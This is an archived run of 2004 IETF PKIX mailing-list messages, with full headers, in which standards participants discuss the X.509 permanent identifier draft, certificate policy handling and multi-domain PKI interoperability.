(8.12.7/8.12.7) with ESMTP id i0SEkaMB010143; Wed, 28 Jan 2004 09:46:37 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020403bc3d78f69af0@[128.33.244.157]> In-Reply-To: <200401281256.i0SCuSn25167@cs.auckland.ac.nz> References: <200401281256.i0SCuSn25167@cs.auckland.ac.nz> Date: Wed, 28 Jan 2004 09:35:50 -0500 To: pgut001@cs.auckland.ac.nz (Peter Gutmann) From: Stephen Kent <kent@bbn.com> Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: anders.rundgren@telia.com, ietf-pkix@imc.org, jjing@betrusted.com, pgut001@cs.auckland.ac.nz Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> At 1:56 +1300 1/29/04, Peter Gutmann wrote: >"Anders Rundgren" <anders.rundgren@telia.com> writes: > >>In case nobody, in spite of Peter Gutmann's generous reward, > >The reward has increased since then, I've had a few contributors in private >mail offer to chip in with other bonuses just to see if Steve can come up with >a useful explanation of a practical management interface for cert policies. Oh Peter, I am flattered, but I am very expensive. Nede to tell me how many zeros are in the reward before I expend any effort on this. steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEcbfG033064; Wed, 28 Jan 2004 06:38:37 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SEcbF0033063; Wed, 28 Jan 2004 06:38:37 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEcWsD033049 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:38:35 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id PAA89384; Wed, 28 Jan 2004 15:46:06 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id QAA11905; Wed, 28 Jan 2004 16:33:46 +0100 Message-ID: <4017C963.8060600@bull.net> Date: Wed, 28 Jan 2004 15:38:27 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: Anders Rundgren <anders.rundgren@telia.com> CC: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt References: <005701c3e08e$9b392fe0$1400a8c0@augustcellars.local> <00c701c3e121$0ae3af90$0500a8c0@arport> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, > Well Jim, > The PI-draft is certainly an odd creature that has been in PKIX's > "custody" for now close to four(!) years. > > A few comments to PI in general and some draft-08 specific. > > Draft-08: identifierType > "The IdentifierType field, when present, is an OID which identifies > both the Assigner Authority and the type of that field. It is an OID" > > The words "type of that field" has never been explained. But we all > know exactly what the authors' mean don't we? :-| > > Draft-08: identifierType has, as you noted been reduced to only support > OIDs, probably due to the authors' belief that OIDs are more permanent. It was not exactly the author's belief, but the IESG belief. > However, the rest of the computer industry have no problems using URIs > making PI "incompatible" and "deviating". A URI also have the > big advantage that it may point to a document. ... that has then disappeared, or even worse, pointing to a document that is different from the original one. > I find this "obsession" with permanence wrong, because if a CA disappears, > its regitered DNS name is taken by somebody else, The URI was to designate an object defined by an Assigner Authority, not by a CA. > the certificates are > anaway no longer usable and names may indeed be reused. That is, OID or URI is a > deployment issue. At best you can RECOMMEND the "serious" > implementer to use an OID. > > PI-General: During the PI development serialNumber has become > the de-facto standard for keeping a permanent (or static which is > really more what we are talking about) identifier. You have already made this comment in the past. serialNumber serves a different purpose. Please take a look at RFC 3039 : The serialNumber attribute type SHALL, when present, be used to differentiate between names where the subject field would otherwise be identical. This attribute has no defined semantics beyond ensuring uniqueness of subject names. > Anyway, PI-using relying party software have little reason to > bother about PI as the existing systems I know of simply does > not "decipher" certificates looking for the most "attractive" > name form(?), they just _assume_ that things are as the CP says. > Most of these CAs also obey to Anders' nowadays (in)famous > "best practice CA formula": > > CA <=> Policy > > which makes identifierType redundant and also eliminating the > need for additional Subject name forms like PI. If you do not have a need for the PI, then that's fine; but other people may wish to use it, as soon/long as it is defined. Denis > Anders > > ----- Original Message ----- > From: "Jim Schaad" <jimsch@nwlink.com> > To: "'Denis Pinkas'" <Denis.Pinkas@bull.net>; "'Tom Gindin'" <tgindin@us.ibm.com> > Cc: <ietf-pkix@imc.org> > Sent: Thursday, January 22, 2004 03:22 > Subject: RE: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > > Comments on draft -08. > > 1. Privacy concerns should be additionally outlined and covered in the > security considerations section. > > 2. Section 1, para 9: Text here allows for an AA to have a unique URI > name. Has been removed from the syntax. > > 3. Section 1, para 14: Suggested text "both the same permanent > identifier value and the same Authority Identifer Value, then these". > (I find the use of identityType to be confusing since I consider this to > relate to type choice of IdentifierValue as well.) > > 4. Section 2: What is the criteria for use of iA5String vs uTF8String? > > > 5. Section 2: When doing comparisons do I need to cross compare these > two different value items? > > 6. Section 2: The statement 'It is an OID.' is redundant and can be > removed. > > 7. Section 3: Contains a paragraph dealing with matching rules. Since > this is no longer a field in the structure the paragraph should be > re-written to state what the one and only matching rule is. > > 8. Appendix A.1: New request, please put a reference to the document > containing the pkix module into the pkix document (i.e. something like > "-- found in [RFC 3280]". This prevents documents from importing > modules that are lower in the standards process without having any > explicit reference to them. > > jim > > > >>-----Original Message----- >>From: owner-ietf-pkix@mail.imc.org >>[mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of >>Internet-Drafts@ietf.org >>Sent: Wednesday, January 21, 2004 1:27 PM >>To: IETF-Announce: >>Cc: ietf-pkix@imc.org >>Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt >> >> >>A New Internet-Draft is available from the on-line >>Internet-Drafts directories. This draft is a work item of the >>Public-Key Infrastructure (X.509) Working Group of the IETF. >> >>Title : Internet X.509 Public Key >>Infrastructure Permanent Identifier >>Author(s) : D. Pinkas, T. Gindin >>Filename : draft-ietf-pkix-pi-08.txt >>Pages : 12 >>Date : 2004-1-21 >> >>This document define a new form of name, called permanent >>identifier, that may be included in the subjectAltName extension >>of a public key certificate issued to an entity. >>The permanent identifier is an optional feature that may be used >>by a CA to indicate that the certificate relates to the same >>entity even if the name or the affiliation of that entity stored >>in the subject or another name form in the subjectAltName extension >>has changed. >>The subject name, carried in the subject field, is only unique >>for each subject entity certified by the one CA as defined by the >>issuer name field. Also, the new name form can carry a >>name that is unique for each subject entity certified by a CA. >> >>A URL for this Internet-Draft is: >>http://www.ietf.org/internet-drafts/draft-> ietf-pkix-pi-08.txt >> >> >>To remove yourself from the IETF >>Announcement list, send a message to >>ietf-announce-request with the word unsubscribe in the body >>of the message. >> >>Internet-Drafts are also available by anonymous FTP. Login >>with the username "anonymous" and a password of your e-mail >>address. After logging in, type "cd internet-drafts" and then >>"get draft-ietf-pkix-pi-08.txt". >> >>A list of Internet-Drafts directories can be found in > > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail > readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SEA0IQ031317; Wed, 28 Jan 2004 06:10:00 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SEA0FZ031316; Wed, 28 Jan 2004 06:10:00 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SE9wm2031298 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:09:59 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id PAA50248; Wed, 28 Jan 2004 15:17:31 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id QAA11482; Wed, 28 Jan 2004 16:05:12 +0100 Message-ID: <4017C2B2.8090901@bull.net> Date: Wed, 28 Jan 2004 15:09:54 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: Peter Sylvester <Peter.Sylvester@EdelWeb.fr> CC: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt References: <200401231423.i0NEN5t26589@chandon.edelweb.fr> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Peter, >>Here is the new text for UTF8. >> >> The IdentifierValue supports one syntax: UTF8String. UTF8String is >> variable length data of octets. The UTF8String syntax is used to >> express a string of characters from the Universal Character Set >> - UCS [ISO10646] (a superset of [Unicode]), encoded following the >> [UTF-8] algorithm. The UCS allows support of most of the world's >> writing systems using a single character set. >> >> Note that Unicode characters U+0000 through U+007F are the same as >> ASCII 0 through 127, respectively, and have the same single octet >> UTF-8 encoding. Other Unicode characters have a multiple octet >> UTF-8 encoding. >> > > > I think you can simply remove all this. Mentionning the backward compatibility with ASCII is not necessarilly straightforward for everybody and giving the references of UTF-8 allows people to identify the relevant documents. Unless there is something wrong in it, I would think it is better to keep it. Denis Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SE9Tmr031277; Wed, 28 Jan 2004 06:09:29 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SE9TPl031276; Wed, 28 Jan 2004 06:09:29 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from odin2.bull.net (odin2.bull.net [192.90.70.84]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SE9QtD031268 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 06:09:27 -0800 (PST) (envelope-from Denis.Pinkas@bull.net) Received: from clbull.frcl.bull.fr (IDENT:root@clbull.frcl.bull.fr [129.182.8.31]) by odin2.bull.net (8.9.3/8.9.3) with ESMTP id PAA49994; Wed, 28 Jan 2004 15:16:59 +0100 Received: from bull.net (frcls4013.frcl.bull.fr [129.182.108.120]) by clbull.frcl.bull.fr (8.9.3/8.9.3) with ESMTP id QAA11472; Wed, 28 Jan 2004 16:04:37 +0100 Message-ID: <4017C28E.5060803@bull.net> Date: Wed, 28 Jan 2004 15:09:18 +0100 From: Denis Pinkas <Denis.Pinkas@bull.net> Organization: Bull SA. User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0 X-Accept-Language: en-us, en, fr MIME-Version: 1.0 To: "BARARI, TIRTHANKAR" <TIRTHANKAR_BARARI@fleet.com> CC: ietf-pkix@imc.org Subject: Re: I-D ACTION:draft-ietf-pkix-pi-08.txt References: <B9347A7A668DC84290DC609C86848EF61947AC@usboswmxmp03.ma.fbf1.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> > Hi Denis and Thomas, > > My comments on the draft - > > In real world, PI implementation will be in phases. So, entities would > migrate from existing certificates (without PI) to new ones with PI included > in the subjectAltName extension. It would be good to include a way to tie in > the prior identity into the new implementation with PI (possibly by adding > the old public key as a field inside PI). This would help link both pre and > post implementation audit records to the same entity. > > This may not be within the scope or address of this version, but may be > worth a consideration for a future richer proposal. Such a link would only allow to make a link with one single certificate and would loose its value with time. Let us keep this document simple. Denis > Tirthankar Barari > > -----Original Message----- > From: Internet-Drafts@ietf.org [mailto:Internet-Drafts@ietf.org] > Sent: Wednesday, January 21, 2004 4:27 PM > Cc: ietf-pkix@imc.org > Subject: I-D ACTION:draft-ietf-pkix-pi-08.txt > > > A New Internet-Draft is available from the on-line Internet-Drafts > directories. > This draft is a work item of the Public-Key Infrastructure (X.509) Working > Group of the IETF. > > Title : Internet X.509 Public Key Infrastructure Permanent > Identifier > Author(s) : D. Pinkas, T. Gindin > Filename : draft-ietf-pkix-pi-08.txt > Pages : 12 > Date : 2004-1-21 > > This document define a new form of name, called permanent > identifier, that may be included in the subjectAltName extension > of a public key certificate issued to an entity. > The permanent identifier is an optional feature that may be used > by a CA to indicate that the certificate relates to the same > entity even if the name or the affiliation of that entity stored > in the subject or another name form in the subjectAltName extension > has changed. > The subject name, carried in the subject field, is only unique > for each subject entity certified by the one CA as defined by the > issuer name field. Also, the new name form can carry a > name that is unique for each subject entity certified by a CA. > > A URL for this Internet-Draft is: > http://www.ietf.org/internet-drafts/draft-ietf-pkix-pi-08.txt > > To remove yourself from the IETF Announcement list, send a message to > ietf-announce-request with the word unsubscribe in the body of the message. > > Internet-Drafts are also available by anonymous FTP. Login with the username > "anonymous" and a password of your e-mail address. After logging in, > type "cd internet-drafts" and then > "get draft-ietf-pkix-pi-08.txt". > > A list of Internet-Drafts directories can be found in > http://www.ietf.org/shadow.html > or ftp://ftp.ietf.org/ietf/1shadow-sites.txt > > > Internet-Drafts can also be obtained by e-mail. > > Send a message to: > mailserv@ietf.org. > In the body type: > "FILE /internet-drafts/draft-ietf-pkix-pi-08.txt". > > NOTE: The mail server at ietf.org can return the document in > MIME-encoded form by using the "mpack" utility. To use this > feature, insert the command "ENCODING mime" before the "FILE" > command. To decode the response(s), you will need "munpack" or > a MIME-compliant mail reader. Different MIME-compliant mail readers > exhibit different behavior, especially when dealing with > "multipart" MIME messages (i.e. documents which have been split > up into multiple messages), so check your local documentation on > how to manipulate these messages. > > > Below is the data which will enable a MIME compliant mail reader > implementation to automatically retrieve the ASCII version of the > Internet-Draft. > > Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SDpPZO030328; Wed, 28 Jan 2004 05:51:25 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SDpPmG030327; Wed, 28 Jan 2004 05:51:25 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from host13.websitesource.com (host13.websitesource.com [209.239.35.152]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SDpOni030321 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 05:51:24 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (dpvc-138-88-161-20.res.east.verizon.net [138.88.161.20]) by host13.websitesource.com (8.12.10/8.12.10) with ESMTP id i0SDpOh2017707 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 08:51:24 -0500 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 08:51:14 -0500 Message-ID: <01c601c3e5a5$ce8e6970$e82b4d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 In-Reply-To: <200401281331.i0SDVh325275@cs.auckland.ac.nz> Importance: Normal Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0SDpOni030322 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> I have sent the Annex J to Peter. I am not sure it is appropriate to post it to the mail list. -----Original Message----- From: Peter Gutmann [mailto:pgut001@cs.auckland.ac.nz] Sent: Wednesday, January 28, 2004 8:32 AM To: chokhani@orionsec.com; ietf-pkix@imc.org Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook "Santosh Chokhani" <chokhani@orionsec.com> writes: >I do not if your reward is punishment or reward, Well it'll certainly be pretty rewarding for anyone watching. >I also encourage you to read Annex J of X.509 draft. Hmm, it's not in any draft I have, is that the eternal-draft fourth edition, or has X.509 skipped the middleman and jumped straight from 4th edition drafts into 5th edition drafts? Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SDVnOY028573; Wed, 28 Jan 2004 05:31:49 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SDVnDT028572; Wed, 28 Jan 2004 05:31:49 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SDVl7W028561 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 05:31:47 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with ESMTP id 656F034007; Thu, 29 Jan 2004 02:30:57 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0SDVh325275; Thu, 29 Jan 2004 02:31:43 +1300 Date: Thu, 29 Jan 2004 02:31:43 +1300 Message-Id: <200401281331.i0SDVh325275@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: chokhani@orionsec.com, ietf-pkix@imc.org Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> "Santosh Chokhani" <chokhani@orionsec.com> writes: >I do not if your reward is punishment or reward, Well it'll certainly be pretty rewarding for anyone watching. >I also encourage you to read Annex J of X.509 draft. Hmm, it's not in any draft I have, is that the eternal-draft fourth edition, or has X.509 skipped the middleman and jumped straight from 4th edition drafts into 5th edition drafts? Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SCuYuI026086; Wed, 28 Jan 2004 04:56:35 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SCuYoq026085; Wed, 28 Jan 2004 04:56:34 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp.cs.auckland.ac.nz (smtp.cs.auckland.ac.nz [130.216.33.151]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SCuXUW026076 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 04:56:33 -0800 (PST) (envelope-from pgut001@cs.auckland.ac.nz) Received: from cs.auckland.ac.nz (medusa01.cs.auckland.ac.nz [130.216.34.33]) by smtp.cs.auckland.ac.nz (Postfix) with ESMTP id 29E9D340DE; Thu, 29 Jan 2004 01:55:43 +1300 (NZDT) Received: (from pgut001@localhost) by cs.auckland.ac.nz (8.11.6/8.11.6) id i0SCuSn25167; Thu, 29 Jan 2004 01:56:28 +1300 Date: Thu, 29 Jan 2004 01:56:28 +1300 Message-Id: <200401281256.i0SCuSn25167@cs.auckland.ac.nz> From: pgut001@cs.auckland.ac.nz (Peter Gutmann) To: anders.rundgren@telia.com, ietf-pkix@imc.org, jjing@betrusted.com Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Cc: pgut001@cs.auckland.ac.nz Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> "Anders Rundgren" <anders.rundgren@telia.com> writes: >In case nobody, in spite of Peter Gutmann's generous reward, The reward has increased since then, I've had a few contributors in private mail offer to chip in with other bonuses just to see if Steve can come up with a useful explanation of a practical management interface for cert policies. As for the person who inquired about the resale value of a bilabial fricative, I'm not exactly sure what the going rate is, you might be able to extrapolate a cost from the amount Mike Batt paid to John Cage for "One Minute's Silence", taking into account the fact that a fricative is a considerably more substantive work and therefore has a somewhat higher book value. >takes on the challenge describing how X.509 policies should be handled by >relying parties [1] based on RFC3280 "as is", > >1] Comprising of software, administrators, end-users, and lawyers. Well, the analysis I posted the last time this came up was that from a business/legal perspective the best way to use cert policies was to do more or less the exact opposite of what the standard said. That is, if the CA is being run as a charity for the benefit of its users then you do what the standard says; if it's being run as a business that needs to manage liability issues, you follow the legal analysis I posted (or at least get your own lawyers to examine how best to use the cert policy mechanism to protect the CA's interests, although I assume you'll get more or less the same answer that the people I talked to gave me). Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SBx6Pu021834; Wed, 28 Jan 2004 03:59:06 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SBx6k7021833; Wed, 28 Jan 2004 03:59:06 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from mtiwmhc11.worldnet.att.net (mtiwmhc11.worldnet.att.net [204.127.131.115]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SBx31E021821 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 03:59:05 -0800 (PST) (envelope-from chokhani@orionsec.com) Received: from wchokhani (114.washington-41rh15-16rt.dc.dial-access.att.net[12.77.62.114]) by worldnet.att.net (mtiwmhc11) with SMTP id <20040128115857111002idqre>; Wed, 28 Jan 2004 11:58:58 +0000 From: "Santosh Chokhani" <chokhani@orionsec.com> To: <ietf-pkix@imc.org> Subject: RE: Setting X.509 Policy Data in IE, IIS, Outlook Date: Wed, 28 Jan 2004 06:58:45 -0500 Message-ID: <01af01c3e596$15c34640$e82b4d0c@hq.orionsec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 In-Reply-To: <200401280029.i0S0TOx20370@cs.auckland.ac.nz> Importance: Normal Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0SBx61E021828 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Peter: I do not if your reward is punishment or reward, if you speak in plain American English (pardon the parochialism) or Hindi will be glad to tell you how the application can be configured for policy processing or the application can provide the user interface. I also encourage you to read Annex J of X.509 draft. -----Original Message----- From: owner-ietf-pkix@mail.imc.org [mailto:owner-ietf-pkix@mail.imc.org] On Behalf Of Peter Gutmann Sent: Tuesday, January 27, 2004 7:29 PM To: anders.rundgren@telia.com; kent@bbn.com Cc: ietf-pkix@imc.org Subject: Re: Setting X.509 Policy Data in IE, IIS, Outlook Stephen Kent <kent@bbn.com> writes: >>Borrowing from your IPsec complaints: >>A "compliant management interface for the security policy database" >>for X.509 would be fun to review. As far as I can see, the X.509 >>policy mechanisms are flawed to the point where it becomes technically >>infeasible to specify such an interface. But I stay interested if >>anybody dares to challenge that statement with something tangible >>instead of the usual PKI mumbo-jumbo, like "there are many ways to do >>this". > >A challenge with no apparent reward to motivate a response, as usual >... I hereby offer a reward of one (1) bilabial fricative to anyone who can provide a clear technical explanation/description of a policy management interface for X.509, to be paid in full upon delivery of said explanation/description. Peter. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.11/8.12.8) with ESMTP id i0SAunEk017505; Wed, 28 Jan 2004 02:56:49 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.11/8.12.9/Submit) id i0SAumWW017504; Wed, 28 Jan 2004 02:56:48 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from iscan02.secomtrust.net (iscan01.secomtrust.net [61.114.177.102]) by above.proper.com (8.12.11/8.12.8) with SMTP id i0SAukrS017494 for <ietf-pkix@imc.org>; Wed, 28 Jan 2004 02:56:46 -0800 (PST) (envelope-from shimaoka@secom.ne.jp) Received: (qmail 5888 invoked by alias); 28 Jan 2004 10:56:44 -0000 Delivered-To: alias-map-ietf-pkix@imc.org@MAP Received: (qmail 5859 invoked by alias); 28 Jan 2004 10:56:42 -0000 Received: from localhost (HELO mail.secomtrust.net) (127.0.0.1) by localhost with SMTP; 28 Jan 2004 10:56:42 -0000 Received: (qmail 28495 invoked from network); 28 Jan 2004 10:56:41 -0000 Received: from unknown (HELO ?172.30.5.54?) (172.30.5.54) by mail with SMTP; 28 Jan 2004 10:56:41 -0000 Date: Wed, 28 Jan 2004 19:57:02 +0900 From: Masaki SHIMAOKA <shimaoka@secom.ne.jp> To: mpki@jnsa.org, Denis Pinkas <Denis.Pinkas@bull.net> Subject: Re[2]: Revised I-D: Memorandum for multi-domain PKI Interoperability Cc: Peter Hesse <pmhesse@geminisecurity.com>, Matt Cooper <mcooper@orionsec.com>, IETF-PKIX <ietf-pkix@imc.org> In-Reply-To: <4014DC9E.4070500@bull.net> References: <20040114194632.05BD.SHIMAOKA@secom.ne.jp> <4014DC9E.4070500@bull.net> Message-Id: <20040128120205.3DAC.SHIMAOKA@secom.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" X-Mailer: Becky! ver. 2.06.02 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by above.proper.com id i0SAulrS017495 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Denis, I appreciate much your review. > The topic of the document is rather close to the following draft: Internet > X.509 Public Key Infrastructure: Certification Path Building available at: > http://www.ietf.org/internet-drafts/draft-ietf-pkix-certpathbuild-03.txt Exactly, my I-D is similar to some part of certpathbuild. The two I-D certpathbuild and my mPKI was almost published simultaneously, and it was very accidental. In the past, some of PKI engineers were also considering the path building and validation. But since I felt that some consensus or definition of PKI topology is required for such discussion, I tried to write this draft. I believe that the authors of certpathbuild felt the same, too. Therefore, they also had the similar part, I think. Hesse and Matt, is it right? Anyway, my wish is to establish consensus of PKI structure models and avoid unnecessary confusion by complex PKI structures. How do you think such necessity? > It seems rather difficult to have two documents on nearly the same topic. > It also seems difficult to issue this document as an Informational RFC. I agree to be difficult having two docs. I guess that integrating my I-D and some part of certpathbuild is nice. But certpathbuild is already huge document... Hesse and Matt, what do you think? The description of path building algorithm is a guidance for application developers. On the other hand, the definition of PKI structure models is a guidance for designers of PKI topology. It is useful when the two PKIs consider how to interconnect each other, such as Bridge CA model or mesh model. So I propose separating to such two documents. > The document contains vocabulary which is not currently used with the PKIX > WG and which could create confusion if adopted. I accept right vocabulary for PKIX WG. > The notion of 